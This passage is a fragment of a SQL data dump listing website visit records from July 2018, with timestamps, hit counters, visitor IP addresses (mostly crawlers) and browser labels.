,1,0,0,'54.36.148.132','other'),(269235,1530945074,1,1,0,0,'54.36.149.100','other'),(269236,1530945196,1,1,0,0,'54.36.148.238','other'),(269237,1530945356,1,1,0,0,'95.163.255.92','other'),(269238,1530945432,1,1,0,0,'54.36.148.85','other'),(269239,1530945443,2,0,2,0,'66.249.69.228',''),(269240,1530945450,1,1,0,0,'54.36.149.85','other'),(269241,1530945538,1,1,0,0,'180.76.15.13','other'),(269242,1530945571,1,1,0,0,'141.8.142.74','other'),(269243,1530945734,1,1,0,0,'66.249.69.187','chrome'),(269244,1530946134,1,0,1,0,'66.249.69.232',''),(269245,1530946144,1,1,0,0,'54.36.149.23','other'),(269246,1530946427,1,0,1,0,'66.249.69.228',''),(269247,1530946460,2,1,1,0,'66.249.69.228',''),(269248,1530946476,1,1,0,0,'54.36.148.51','other'),(269249,1530946512,1,1,0,0,'54.36.148.139','other'),(269250,1530946983,1,1,0,0,'8.29.198.27','other'),(269251,1530947034,1,1,0,0,'54.36.149.84','other'),(269252,1530947056,1,1,0,0,'87.250.224.46','other'),(269253,1530947070,1,1,0,0,'54.36.149.31','other'),(269254,1530947387,4,4,0,0,'216.244.66.241','other'),(269255,1530947510,1,1,0,0,'54.36.148.137','other'),(269256,1530947639,1,1,0,0,'54.36.148.212','other'),(269257,1530947986,1,1,0,0,'178.154.171.88','other'),(269258,1530948919,1,1,0,0,'5.45.207.49','other'),(269259,1530948956,1,1,0,0,'54.36.148.248','other'),(269260,1530949253,2,0,2,0,'66.249.69.228',''),(269261,1530949258,1,1,0,0,'54.36.149.95','other'),(269262,1530949298,3,0,3,0,'66.249.69.230',''),(269263,1530949454,1,0,1,0,'66.249.69.232',''),(269264,1530950119,1,1,0,0,'54.36.148.54','other'),(269265,1530950425,2,2,0,0,'216.244.66.241','other'),(269266,1530951174,1,1,0,0,'54.36.148.239','other'),(269267,1530951320,1,1,0,0,'162.210.196.97','other'),(269268,1530951367,1,1,0,0,'54.36.149.23','other'),(269269,1530951405,1,1,0,0,'95.163.255.103','other'),(269270,1530951448,2,0,2,0,'66.249.69.185',''),(269271,1530951477,1,1,0,0,'46.135.87.110','chrome'),(269272,1530951509,1,1,0,0,'91.196.178.164','chrome'),(269273,1530951637,1,1,0,0,'54.36.148.168','other'),(269274,1530951988,1,1,0,0,'66.249.69.232','chrome'),(269275,1530952266,1,1,0,0,'91.196.178.178','chrome'),(269276,1530952336,3,3,0,0,'216.244.66.241','other'),(269277,1530952915,1,1,0,0,'54.36.148.101','other'),(269278,1530953152,1,1,0,0,'54.36.148.37','other'),(269279,1530953295,1,1,0,0,'54.36.148.245','other'),(269280,1530953386,2,0,2,0,'66.249.69.187',''),(269281,1530953562,2,2,0,0,'54.36.149.90','other'),(269282,1530953628,1,1,0,0,'8.29.198.25','other'),(269283,1530953831,1,0,1,0,'66.249.69.230',''),(269284,1530953947,1,1,0,0,'54.36.148.49','other'),(269285,1530954089,1,0,1,0,'66.249.69.189',''),(269286,1530954356,1,1,0,0,'54.36.148.101','other'),(269287,1530954841,1,1,0,0,'141.8.142.74','other'),(269288,1530954901,1,1,0,0,'54.36.148.61','other'),(269289,1530955066,2,0,2,0,'66.249.69.228',''),(269290,1530955096,1,1,0,0,'54.36.148.135','other'),(269291,1530955215,1,0,1,0,'66.249.69.230',''),(269292,1530955325,1,1,0,0,'216.244.66.241','other'),(269293,1530955429,1,1,0,0,'54.36.148.54','other'),(269294,1530955745,1,1,0,0,'54.36.148.180','other'),(269295,1530955799,1,1,0,0,'54.36.148.119','other'),(269296,1530955987,1,1,0,0,'54.165.59.7','other'),(269297,1530956021,1,1,0,0,'54.36.149.8','other'),(269298,1530956194,2,2,0,0,'178.154.171.88','other'),(269299,1530956270,1,1,0,0,'54.36.148.199','other'),(269300,1530956301,1,1,0,0,'216.244.66.241','other'),(269301,1530956698,1,1,0,0,'95.163.255.99','other'),(269302,1530956955,1,1,0,0,'54.36.148.66','other'),(269303,1530957098,1,1,0,0,'54.36.149.101','other'),(269304,1530957200,1,1,0,0,'54.36.148.29','other'),(269305,1530957385,1,1,0,0,'95.163.255.98','other'),(269306,1530957494,1,1,0,0,'54.36.148.50','other'),(269307,1530957823,1,1,0,0,'8.29.198.27','other'),(269308,1530958747,6,6,0,0,'216.244.66.241','other'),(269309,1530958895,1,1,0,0,'54.36.148.116','other'),(269310,1530958910,1,1,0,0,'54.36.148.168','other'),(269311,1530959064,1,1,0,0,'54.36.148.54','other'),(269312,1530959103,1,1,0,0,'54.36.149.98','other'),(269313,1530959263,1,1,0,0,'178.154.171.88','other'),(269314,1530959527,1,1,0,0,'54.36.148.60','other'),(269315,1530959553,1,1,0,0,'54.36.148.68','other'),(269316,1530959798,1,1,0,0,'54.36.148.200','other'),(269317,1530959809,1,1,0,0,'54.36.149.86','other'),(269318,1530960539,1,1,0,0,'54.36.149.1','other'),(269319,1530960831,1,1,0,0,'54.36.149.105','other'),(269320,1530960961,5,5,0,0,'216.244.66.241','other'),(269321,1530961033,1,1,0,0,'54.36.149.36','other'),(269322,1530961138,3,3,0,0,'141.8.142.74','other'),(269323,1530961239,1,1,0,0,'178.154.171.88','other'),(269324,1530961351,1,0,1,0,'66.249.69.187',''),(269325,1530961517,1,1,0,0,'54.36.148.82','other'),(269326,1530961805,1,1,0,0,'54.36.149.55','other'),(269327,1530962320,1,1,0,0,'178.154.171.88','other'),(269328,1530962372,1,1,0,0,'216.244.66.241','other'),(269329,1530962562,1,1,0,0,'54.36.148.77','other'),(269330,1530962566,1,1,0,0,'54.36.149.12','other'),(269331,1530962968,1,1,0,0,'157.55.39.97','other'),(269332,1530963272,1,0,1,0,'66.249.69.185',''),(269333,1530963451,2,2,0,0,'178.154.171.88','other'),(269334,1530963613,1,1,0,0,'54.36.148.117','other'),(269335,1530963890,1,0,1,0,'66.249.69.189',''),(269336,1530964104,1,1,0,0,'54.36.148.17','other'),(269337,1530964359,1,1,0,0,'95.163.255.119','other'),(269338,1530964452,1,1,0,0,'54.36.148.40','other'),(269339,1530964479,1,1,0,0,'8.29.198.25','other'),(269340,1530964594,1,1,0,0,'178.154.171.88','other'),(269341,1530964728,1,1,0,0,'216.244.66.241','other'),(269342,1530965209,1,1,0,0,'54.36.149.21','other'),(269343,1530965219,1,0,1,0,'66.249.69.189',''),(269344,1530965352,1,1,0,0,'54.36.148.186','other'),(269345,1530965669,1,1,0,0,'54.36.149.91','other'),(269346,1530965769,1,1,0,0,'54.36.148.170','other'),(269347,1530965899,1,1,0,0,'54.36.148.242','other'),(269348,1530965931,1,1,0,0,'157.55.39.102','other'),(269349,1530966145,1,1,0,0,'54.36.149.36','other'),(269350,1530966147,1,1,0,0,'54.36.148.99','other'),(269351,1530966290,2,2,0,0,'178.154.171.88','other'),(269352,1530966353,1,1,0,0,'95.163.255.154','other'),(269353,1530966385,1,1,0,0,'141.8.142.74','other'),(269354,1530966424,1,1,0,0,'195.182.202.33','chrome'),(269355,1530966775,1,0,1,0,'66.249.69.230',''),(269356,1530967032,1,1,0,0,'54.36.148.247','other'),(269357,1530967341,1,1,0,0,'54.36.148.38','other'),(269358,1530967354,1,1,0,0,'54.36.148.202','other'),(269359,1530967505,1,1,0,0,'54.36.149.88','other'),(269360,1530967524,3,3,0,0,'216.244.66.241','other'),(269361,1530967606,1,1,0,0,'54.36.148.118','other'),(269362,1530967883,1,1,0,0,'54.36.149.66','other'),(269363,1530968082,1,1,0,0,'87.250.224.46','other'),(269364,1530968678,1,1,0,0,'8.29.198.25','other'),(269365,1530969142,1,1,0,0,'54.36.148.248','other'),(269366,1530969192,2,0,2,0,'66.249.69.187',''),(269367,1530969300,2,0,2,0,'66.249.69.228',''),(269368,1530969397,3,0,3,0,'66.249.69.230',''),(269369,1530969400,4,0,4,0,'66.249.69.232',''),(269370,1530969483,1,1,0,0,'54.36.148.41','other'),(269371,1530969788,3,1,2,0,'66.249.69.230',''),(269372,1530969842,2,1,1,0,'66.249.69.185',''),(269373,1530970076,1,1,0,0,'37.9.113.101','other'),(269374,1530970155,1,1,0,0,'91.209.11.236','other'),(269375,1530970259,3,0,3,0,'66.249.69.228',''),(269376,1530970297,1,1,0,0,'66.249.69.230','chrome'),(269377,1530970313,1,1,0,0,'66.249.69.187','chrome'),(269378,1530970366,2,0,2,0,'66.249.69.232',''),(269379,1530970510,2,2,0,0,'216.244.66.241','other'),(269380,1530971163,1,0,1,0,'66.249.69.228',''),(269381,1530971337,1,1,0,0,'54.36.149.29','other'),(269382,1530971352,1,0,1,0,'66.249.69.185',''),(269383,1530971451,2,0,2,0,'66.249.69.232',''),(269384,1530971707,1,0,1,0,'66.249.69.230',''),(269385,1530972064,2,0,2,0,'66.249.69.228',''),(269386,1530972161,2,2,0,0,'92.113.189.235','chrome'),(269387,1530972332,1,1,0,0,'54.36.148.117','other'),(269388,1530972405,3,3,0,0,'216.244.66.241','other'),(269389,1530972721,1,1,0,0,'54.36.148.46','other'),(269390,1530972731,1,1,0,0,'54.36.148.18','other'),(269391,1530973023,1,0,1,0,'66.249.69.187',''),(269392,1530973152,1,1,0,0,'141.8.142.74','other'),(269393,1530973217,4,0,4,0,'66.249.69.230',''),(269394,1530973262,2,2,0,0,'92.113.189.235','chrome'),(269395,1530973339,1,1,0,0,'216.244.66.241','other'),(269396,1530973414,1,0,1,0,'66.249.69.232',''),(269397,1530973428,1,0,1,0,'66.249.69.228',''),(269398,1530973855,1,1,0,0,'54.36.148.174','other'),(269399,1530973950,1,1,0,0,'87.250.224.46','other'),(269400,1530973983,1,1,0,0,'54.36.148.182','other'),(269401,1530974328,1,0,1,0,'66.249.69.185',''),(269402,1530974460,1,1,0,0,'95.163.255.98','other'),(269403,1530974870,1,1,0,0,'54.36.149.87','other'),(269404,1530974899,1,1,0,0,'54.36.149.8','other'),(269405,1530974956,1,1,0,0,'193.106.30.99','firefox'),(269406,1530975040,3,3,0,0,'216.244.66.241','other'),(269407,1530975081,1,1,0,0,'54.36.149.32','other'),(269408,1530975143,2,2,0,0,'141.8.142.74','other'),(269409,1530975169,1,0,1,0,'66.249.69.189',''),(269410,1530975208,2,0,2,0,'66.249.69.232',''),(269411,1530975234,3,0,3,0,'66.249.69.230',''),(269412,1530975337,1,1,0,0,'8.29.198.25','other'),(269413,1530975384,3,0,3,0,'66.249.69.228',''),(269414,1530975460,1,1,0,0,'178.154.171.88','other'),(269415,1530975575,1,1,0,0,'54.36.148.139','other'),(269416,1530975594,1,1,0,0,'54.36.148.106','other'),(269417,1530975852,1,1,0,0,'54.36.148.166','other'),(269418,1530975892,1,1,0,0,'54.36.149.69','other'),(269419,1530976156,1,1,0,0,'54.36.148.235','other'),(269420,1530976241,1,1,0,0,'54.36.148.248','other'),(269421,1530976257,1,1,0,0,'54.36.148.244','other'),(269422,1530976303,1,0,1,0,'66.249.69.185',''),(269423,1530976309,1,1,0,0,'193.106.30.99','firefox'),(269424,1530976375,1,1,0,0,'178.154.171.88','other'),(269425,1530976449,1,1,0,0,'54.36.148.204','other'),(269426,1530976521,1,1,0,0,'54.36.148.97','other'),(269427,1530976694,1,1,0,0,'54.36.149.9','other'),(269428,1530976857,1,1,0,0,'54.36.148.78','other'),(269429,1530977048,3,0,3,0,'66.249.69.232',''),(269430,1530977404,2,2,0,0,'141.8.142.74','other'),(269431,1530977462,1,1,0,0,'54.36.148.175','other'),(269432,1530977607,3,3,0,0,'216.244.66.241','other'),(269433,1530977656,3,0,3,0,'66.249.69.230',''),(269434,1530978011,1,1,0,0,'54.36.149.71','other'),(269435,1530978449,7,0,7,0,'66.249.69.228',''),(269436,1530978461,1,1,0,0,'157.55.39.102','other'),(269437,1530978546,1,1,0,0,'216.244.66.241','other'),(269438,1530978659,1,1,0,0,'54.36.148.61','other'),(269439,1530979099,1,0,1,0,'66.249.69.187',''),(269440,1530979344,1,1,0,0,'54.36.148.68','other'),(269441,1530979431,2,0,2,0,'66.249.69.232',''),(269442,1530979435,1,1,0,0,'91.196.178.41','chrome'),(269443,1530979473,2,0,2,0,'66.249.69.228',''),(269444,1530979522,1,1,0,0,'8.29.198.25','other'),(269445,1530979601,1,1,0,0,'54.36.148.187','other'),(269446,1530980007,3,3,0,0,'178.154.171.88','other'),(269447,1530980172,1,1,0,0,'54.36.148.50','other'),(269448,1530980173,2,2,0,0,'87.250.224.46','other'),(269449,1530980305,2,2,0,0,'141.8.142.74','other'),(269450,1530980409,4,0,4,0,'66.249.69.230',''),(269451,1530980421,6,6,0,0,'216.244.66.241','other'),(269452,1530980537,1,1,0,0,'37.53.226.124','chrome'),(269453,1530980652,3,0,3,0,'66.249.69.232',''),(269454,1530980662,1,1,0,0,'107.167.108.210','other'),(269455,1530980666,2,2,0,0,'95.163.255.105','other'),(269456,1530980674,3,3,0,0,'95.163.255.115','other'),(269457,1530980684,1,1,0,0,'95.163.255.102','other'),(269458,1530980692,1,1,0,0,'95.163.255.104','other'),(269459,1530980699,1,1,0,0,'95.163.255.106','other'),(269460,1530980704,1,1,0,0,'54.36.149.58','other'),(269461,1530980710,4,4,0,0,'95.163.255.118','other'),(269462,1530980725,3,3,0,0,'95.163.255.107','other'),(269463,1530980740,4,4,0,0,'95.163.255.114','other'),(269464,1530980781,1,1,0,0,'95.163.255.119','other'),(269465,1530980788,1,1,0,0,'95.163.255.103','other'),(269466,1530980796,1,1,0,0,'95.163.255.117','other'),(269467,1530980823,2,2,0,0,'95.163.255.108','other'),(269468,1530980838,1,1,0,0,'95.163.255.109','other'),(269469,1530980840,4,0,4,0,'66.249.69.228',''),(269470,1530981152,1,1,0,0,'54.36.148.145','other'),(269471,1530981544,1,1,0,0,'178.154.200.41','other'),(269472,1530981736,2,0,2,0,'66.249.69.230',''),(269473,1530981760,1,0,1,0,'66.249.69.187',''),(269474,1530981925,1,1,0,0,'193.106.30.99','firefox'),(269475,1530982184,1,1,0,0,'141.8.142.74','other'),(269476,1530982258,1,1,0,0,'54.36.148.240','other'),(269477,1530982301,1,1,0,0,'54.36.149.101','other'),(269478,1530982478,1,0,1,0,'66.249.69.228',''),(269479,1530982503,1,0,1,0,'66.249.69.232',''),(269480,1530982505,1,1,0,0,'54.36.148.250','other'),(269481,1530982598,1,1,0,0,'157.55.39.102','other'),(269482,1530982628,1,1,0,0,'66.249.69.185','chrome'),(269483,1530982638,1,1,0,0,'66.249.69.228','chrome'),(269484,1530983445,1,0,1,0,'66.249.69.232',''),(269485,1530983472,2,2,0,0,'216.244.66.241','other'),(269486,1530983555,1,1,0,0,'54.36.148.38','other'),(269487,1530983862,1,1,0,0,'157.55.39.100','other'),(269488,1530983879,1,0,1,0,'66.249.69.228',''),(269489,1530983947,1,1,0,0,'178.154.171.88','other'),(269490,1530984070,1,1,0,0,'141.8.142.74','other'),(269491,1530984075,1,1,0,0,'52.91.10.254','other'),(269492,1530984166,1,1,0,0,'54.36.148.253','other'),(269493,1530984285,1,1,0,0,'54.36.148.89','other'),(269494,1530984643,1,0,1,0,'66.249.69.189',''),(269495,1530984948,2,0,2,0,'66.249.69.230',''),(269496,1530985068,1,1,0,0,'54.36.149.37','other'),(269497,1530985087,1,0,1,0,'66.249.69.187',''),(269498,1530985116,1,1,0,0,'54.36.148.66','other'),(269499,1530985257,2,0,2,0,'66.249.69.232',''),(269500,1530985322,1,1,0,0,'141.8.142.74','other'),(269501,1530985441,2,2,0,0,'216.244.66.241','other'),(269502,1530985535,4,0,4,0,'66.249.69.228',''),(269503,1530986103,1,1,0,0,'95.163.255.94','other'),(269504,1530986190,1,1,0,0,'8.29.198.25','other'),(269505,1530986320,2,0,2,0,'66.249.69.232',''),(269506,1530986336,1,1,0,0,'109.86.35.199','chrome'),(269507,1530986536,1,1,0,0,'54.36.148.211','other'),(269508,1530986624,1,1,0,0,'87.250.224.46','other'),(269509,1530986628,2,2,0,0,'141.8.142.74','other'),(269510,1530986942,5,0,5,0,'66.249.69.230',''),(269511,1530987160,1,1,0,0,'54.36.149.34','other'),(269512,1530987178,1,1,0,0,'54.36.149.3','other'),(269513,1530987181,5,0,5,0,'66.249.69.228',''),(269514,1530987194,1,1,0,0,'54.36.148.209','other'),(269515,1530987307,1,1,0,0,'54.36.148.62','other'),(269516,1530987361,1,1,0,0,'54.36.148.246','other'),(269517,1530987565,1,1,0,0,'54.36.148.239','other'),(269518,1530987567,1,1,0,0,'54.36.148.210','other'),(269519,1530987572,1,1,0,0,'54.36.148.120','other'),(269520,1530987696,2,1,1,0,'66.249.69.228',''),(269521,1530987729,1,0,1,0,'66.249.69.232',''),(269522,1530987957,1,1,0,0,'54.36.149.95','other'),(269523,1530988039,1,1,0,0,'18.209.161.2','other'),(269524,1530988196,2,2,0,0,'216.244.66.241','other'),(269525,1530988202,1,0,1,0,'66.249.69.244',''),(269526,1530988373,1,0,1,0,'66.249.69.246',''),(269527,1530988403,1,1,0,0,'178.175.132.165','firefox'),(269528,1530988704,1,0,1,0,'66.249.69.230',''),(269529,1530989019,3,0,3,0,'66.249.69.228',''),(269530,1530989036,1,1,0,0,'54.36.148.161','other'),(269531,1530989114,1,1,0,0,'188.163.5.53','chrome'),(269532,1530989347,2,2,0,0,'141.8.142.74','other'),(269533,1530989454,1,1,0,0,'54.36.148.172','other'),(269534,1530989638,2,2,0,0,'91.196.178.176','chrome'),(269535,1530989818,1,1,0,0,'52.91.10.254','other'),(269536,1530989934,2,0,2,0,'66.249.69.230',''),(269537,1530990160,1,1,0,0,'54.36.148.71','other'),(269538,1530990164,2,0,2,0,'66.249.69.228',''),(269539,1530990362,1,1,0,0,'8.29.198.25','other'),(269540,1530990658,1,1,0,0,'54.36.149.41','other'),(269541,1530990765,1,0,1,0,'66.249.69.187',''),(269542,1530990923,1,0,1,0,'66.249.69.230',''),(269543,1530990980,3,3,0,0,'216.244.66.241','other'),(269544,1530991383,1,1,0,0,'95.163.255.167','other'),(269545,1530991402,1,1,0,0,'52.91.10.254','other'),(269546,1530991708,1,1,0,0,'157.55.39.100','other'),(269547,1530991825,1,1,0,0,'54.36.149.18','other'),(269548,1530991875,1,1,0,0,'178.154.200.41','other'),(269549,1530991933,1,1,0,0,'216.244.66.241','other'),(269550,1530992042,1,1,0,0,'54.36.148.96','other'),(269551,1530992173,1,1,0,0,'54.36.148.154','other'),(269552,1530992269,2,2,0,0,'54.36.148.21','other'),(269553,1530992423,1,1,0,0,'178.154.171.88','other'),(269554,1530992460,1,1,0,0,'141.8.142.74','other'),(269555,1530992588,1,1,0,0,'54.36.148.208','other'),(269556,1530992650,2,0,2,0,'66.249.69.228',''),(269557,1530992731,2,0,2,0,'66.249.69.230',''),(269558,1530993035,1,0,1,0,'66.249.69.189',''),(269559,1530993541,1,1,0,0,'141.8.142.74','other'),(269560,1530993678,1,1,0,0,'54.36.148.113','other'),(269561,1530993698,1,1,0,0,'54.36.149.61','other'),(269562,1530993981,2,0,2,0,'66.249.69.232',''),(269563,1530993990,1,1,0,0,'37.9.113.100','other'),(269564,1530994096,1,1,0,0,'54.36.148.132','other'),(269565,1530994368,1,0,1,0,'66.249.69.228',''),(269566,1530994371,2,0,2,0,'66.249.69.230',''),(269567,1530994385,2,2,0,0,'216.244.66.241','other'),(269568,1530994539,1,1,0,0,'54.36.148.116','other'),(269569,1530994557,1,1,0,0,'54.36.148.184','other'),(269570,1530994569,1,1,0,0,'54.36.149.71','other'),(269571,1530994619,1,1,0,0,'54.36.149.8','other'),(269572,1530994653,3,3,0,0,'141.8.142.74','other'),(269573,1530994805,1,1,0,0,'54.36.148.137','other'),(269574,1530995088,1,1,0,0,'54.36.149.59','other'),(269575,1530995112,1,0,1,0,'66.249.69.189',''),(269576,1530995134,1,0,1,0,'66.249.69.185',''),(269577,1530995140,1,1,0,0,'66.249.69.185','chrome'),(269578,1530995300,1,0,1,0,'66.249.69.240',''),(269579,1530995326,1,1,0,0,'54.36.148.76','other'),(269580,1530995432,1,1,0,0,'54.36.148.14','other'),(269581,1530995792,3,0,3,0,'66.249.69.228',''),(269582,1530996016,5,0,5,0,'66.249.69.230',''),(269583,1530996022,1,1,0,0,'141.8.142.74','other'),(269584,1530996050,1,1,0,0,'18.209.161.2','other'),(269585,1530996111,4,4,0,0,'216.244.66.241','other'),(269586,1530996279,3,1,2,0,'66.249.69.228',''),(269587,1530996326,1,1,0,0,'54.36.149.58','other'),(269588,1530996347,1,1,0,0,'54.36.148.238','other'),(269589,1530996531,1,1,0,0,'54.36.149.76','other'),(269590,1530996553,3,0,3,0,'66.249.69.232',''),(269591,1530997037,1,1,0,0,'8.29.198.26','other'),(269592,1530997042,3,0,3,0,'66.249.69.230',''),(269593,1530997109,1,1,0,0,'54.36.148.18','other'),(269594,1530997205,1,1,0,0,'54.36.149.0','other'),(269595,1530997230,1,1,0,0,'216.244.66.241','other'),(269596,1530997442,1,1,0,0,'54.36.148.246','other'),(269597,1530997745,1,1,0,0,'141.8.142.74','other'),(269598,1530998145,1,1,0,0,'216.244.66.241','other'),(269599,1530998464,1,1,0,0,'54.36.149.59','other'),(269600,1530998492,1,1,0,0,'54.36.148.124','other'),(269601,1530998749,2,0,2,0,'66.249.69.232',''),(269602,1530999147,1,0,1,0,'66.249.69.230',''),(269603,1530999569,1,1,0,0,'54.36.149.43','other'),(269604,1530999573,5,0,5,0,'66.249.69.228',''),(269605,1530999969,1,1,0,0,'54.36.148.195','other'),(269606,1531000007,2,0,2,0,'66.249.69.232',''),(269607,1531000247,1,0,1,0,'66.249.69.230',''),(269608,1531000488,2,0,2,0,'66.249.69.228',''),(269609,1531000589,2,2,0,0,'141.8.142.74','other'),(269610,1531000602,1,1,0,0,'54.36.148.14','other'),(269611,1531000882,1,1,0,0,'54.36.148.209','other'),(269612,1531000954,1,1,0,0,'54.36.148.50','other'),(269613,1531000971,2,2,0,0,'216.244.66.241','other'),(269614,1531001099,1,1,0,0,'54.36.149.96','other'),(269615,1531001210,1,1,0,0,'8.29.198.27','other'),(269616,1531001600,3,3,0,0,'141.8.142.74','other'),(269617,1531001882,1,1,0,0,'54.36.148.180','other'),(269618,1531001912,5,5,0,0,'216.244.66.241','other'),(269619,1531001923,1,0,1,0,'66.249.69.230',''),(269620,1531001973,1,1,0,0,'54.36.149.80','other'),(269621,1531001987,1,1,0,0,'54.36.148.16','other'),(269622,1531002476,1,1,0,0,'54.36.148.195','other'),(269623,1531002535,2,2,0,0,'141.8.142.74','other'),(269624,1531002561,1,1,0,0,'54.36.148.196','other'),(269625,1531002725,1,1,0,0,'54.36.149.11','other'),(269626,1531003056,1,1,0,0,'54.36.149.69','other'),(269627,1531003161,1,1,0,0,'87.250.224.46','other'),(269628,1531003319,1,1,0,0,'54.36.148.60','other'),(269629,1531003370,1,1,0,0,'54.36.149.42','other'),(269630,1531003487,1,1,0,0,'66.249.69.232','chrome'),(269631,1531003499,1,1,0,0,'54.36.148.160','other'),(269632,1531003542,1,1,0,0,'54.36.149.20','other'),(269633,1531003635,1,1,0,0,'54.36.148.137','other'),(269634,1531004268,4,0,4,0,'66.249.69.230',''),(269635,1531004271,1,0,1,0,'66.249.69.228',''),(269636,1531004695,1,0,1,0,'66.249.69.187',''),(269637,1531004753,1,1,0,0,'54.36.148.134','other'),(269638,1531004869,1,0,1,0,'66.249.69.232',''),(269639,1531005454,2,2,0,0,'216.244.66.241','other'),(269640,1531005521,3,3,0,0,'178.154.171.88','other'),(269641,1531005774,7,0,7,0,'66.249.69.230',''),(269642,1531005880,2,2,0,0,'141.8.142.74','other'),(269643,1531005968,1,1,0,0,'54.36.149.9','other'),(269644,1531006071,6,0,6,0,'66.249.69.228',''),(269645,1531006099,4,0,4,0,'66.249.69.232',''),(269646,1531006204,1,1,0,0,'54.36.148.128','other'),(269647,1531006320,1,1,0,0,'54.36.148.194','other'),(269648,1531006532,16,1,15,0,'66.249.69.228',''),(269649,1531006797,2,0,2,0,'66.249.69.230',''),(269650,1531006830,1,1,0,0,'40.77.167.138','other'),(269651,1531006921,2,2,0,0,'178.154.171.88','other'),(269652,1531007293,2,1,1,0,'66.249.69.232',''),(269654,1531007460,476,476,0,0,'80.248.225.4','other'),(269655,1531007538,4,4,0,0,'216.244.66.241','other'),(269656,1531007568,1,1,0,0,'54.36.148.50','other'),(269657,1531007607,1,1,0,0,'54.36.148.10','other'),(269658,1531007750,1,1,0,0,'54.36.148.98','other'),(269659,1531007802,1,1,0,0,'141.8.142.74','other'),(269660,1531007804,2,0,2,0,'66.249.69.230',''),(269661,1531007849,2,0,2,0,'66.249.69.189',''),(269662,1531007875,1,1,0,0,'8.29.198.25','other'),(269663,1531008009,1,1,0,0,'54.36.148.20','other'),(269664,1531008198,1,0,1,0,'66.249.69.232',''),(269665,1531008224,3,0,3,0,'66.249.69.228',''),(269666,1531008361,388,388,0,0,'80.248.225.4','other'),(269667,1531008730,1,1,0,0,'54.36.149.15','other'),(269668,1531009485,1,1,0,0,'95.163.255.95','other'),(269669,1531009553,1,0,1,0,'66.249.69.230',''),(269670,1531009691,1,1,0,0,'178.154.171.88','other'),(269671,1531009738,9,9,0,0,'216.244.66.241','other'),(269672,1531011131,2,2,0,0,'141.8.142.74','other'),(269673,1531011309,1,1,0,0,'54.36.149.107','other'),(269674,1531011386,1,1,0,0,'13.66.205.121','other'),(269675,1531011460,1,1,0,0,'54.36.148.228','other'),(269676,1531011875,1,0,1,0,'66.249.69.189',''),(269677,1531011979,1,1,0,0,'178.154.171.88','other'),(269678,1531012039,1,1,0,0,'8.29.198.27','other'),(269679,1531012059,1,1,0,0,'54.36.148.84','other'),(269680,1531012125,1,1,0,0,'54.36.149.20','other'),(269681,1531012486,2,0,2,0,'66.249.69.230',''),(269682,1531012647,1,0,1,0,'66.249.69.228',''),(269683,1531012990,1,1,0,0,'95.163.255.108','other'),(269684,1531012999,1,1,0,0,'95.163.255.105','other'),(269685,1531013005,2,2,0,0,'95.163.255.115','other'),(269686,1531013233,1,1,0,0,'54.36.149.82','other'),(269687,1531013244,1,1,0,0,'54.36.148.172','other'),(269688,1531013245,2,2,0,0,'216.244.66.241','other'),(269689,1531013273,1,1,0,0,'54.36.148.183','other'),(269690,1531013292,1,1,0,0,'141.8.142.74','other'),(269691,1531013315,1,1,0,0,'54.36.148.160','other'),(269692,1531013404,1,1,0,0,'178.154.171.88','other'),(269693,1531013407,1,1,0,0,'54.36.148.133','other'),(269694,1531013416,1,1,0,0,'157.55.39.100','other'),(269695,1531013749,1,1,0,0,'54.36.148.134','other'),(269696,1531014288,2,2,0,0,'54.36.148.21','other'),(269697,1531014484,1,1,0,0,'54.36.148.39','other'),(269698,1531015078,3,3,0,0,'141.8.142.74','other'),(269699,1531015172,1,1,0,0,'54.36.149.77','other'),(269700,1531015210,2,2,0,0,'95.163.255.94','other'),(269701,1531015429,1,1,0,0,'54.36.149.80','other'),(269702,1531015582,1,1,0,0,'54.36.149.8','other'),(269703,1531015656,1,0,1,0,'66.249.69.232',''),(269704,1531015703,2,0,2,0,'66.249.69.189',''),(269705,1531015825,1,1,0,0,'120.132.52.193','chrome'),(269706,1531015946,2,2,0,0,'216.244.66.241','other'),(269707,1531016033,1,1,0,0,'54.36.148.215','other'),(269708,1531016133,1,0,1,0,'66.249.69.230',''),(269709,1531016159,3,0,3,0,'66.249.69.228',''),(269710,1531016241,1,1,0,0,'141.8.142.74','other'),(269711,1531016496,1,1,0,0,'54.36.148.249','other'),(269712,1531017019,1,0,1,0,'66.249.69.187',''),(269713,1531017236,1,0,1,0,'66.249.69.230',''),(269714,1531017277,1,1,0,0,'54.36.148.82','other'),(269715,1531017323,1,1,0,0,'54.36.148.70','other'),(269716,1531017413,1,1,0,0,'54.36.148.96','other'),(269717,1531017743,1,1,0,0,'54.36.148.20','other'),(269718,1531017833,1,0,1,0,'66.249.69.232',''),(269719,1531017974,2,0,2,0,'66.249.69.185',''),(269720,1531018073,2,2,0,0,'54.165.59.7','other'),(269721,1531018203,1,1,0,0,'54.36.148.35','other'),(269722,1531018422,1,1,0,0,'141.8.142.74','other'),(269723,1531018458,1,1,0,0,'54.36.148.241','other'),(269724,1531018576,1,1,0,0,'87.250.224.46','other'),(269725,1531018729,1,1,0,0,'8.29.198.25','other'),(269726,1531018816,1,1,0,0,'54.36.148.190','other'),(269727,1531018912,6,0,6,0,'66.249.69.230',''),(269728,1531019117,2,0,2,0,'66.249.69.232',''),(269729,1531019332,1,1,0,0,'54.36.148.199','other'),(269730,1531019503,1,1,0,0,'141.8.142.74','other'),(269731,1531019558,2,0,2,0,'66.249.69.228',''),(269732,1531019735,1,0,1,0,'66.249.69.244',''),(269733,1531019781,3,1,2,0,'66.249.69.240',''),(269734,1531020106,1,1,0,0,'54.36.148.26','other'),(269735,1531020483,3,3,0,0,'216.244.66.241','other'),(269736,1531020485,2,2,0,0,'141.8.142.74','other'),(269737,1531020625,1,1,0,0,'54.36.148.144','other'),(269738,1531020711,1,1,0,0,'178.154.171.88','other'),(269739,1531020877,1,1,0,0,'54.36.149.0','other'),(269740,1531020885,4,0,4,0,'66.249.69.230',''),(269741,1531020919,4,0,4,0,'66.249.69.228',''),(269742,1531021357,1,1,0,0,'54.36.148.97','other'),(269743,1531021610,1,1,0,0,'54.36.148.85','other'),(269744,1531022025,1,1,0,0,'54.36.148.147','other'),(269745,1531022057,1,0,1,0,'66.249.69.189',''),(269746,1531022103,1,1,0,0,'54.36.148.113','other'),(269747,1531022122,1,1,0,0,'54.36.148.58','other'),(269748,1531022146,1,0,1,0,'66.249.69.185',''),(269749,1531022191,1,1,0,0,'178.154.171.88','other'),(269750,1531022272,1,1,0,0,'141.8.142.74','other'),(269751,1531022312,5,0,5,0,'66.249.69.232',''),(269752,1531022543,6,0,6,0,'66.249.69.228',''),(269753,1531022608,3,3,0,0,'216.244.66.241','other'),(269754,1531022656,1,1,0,0,'54.36.148.182','other'),(269755,1531022846,2,0,2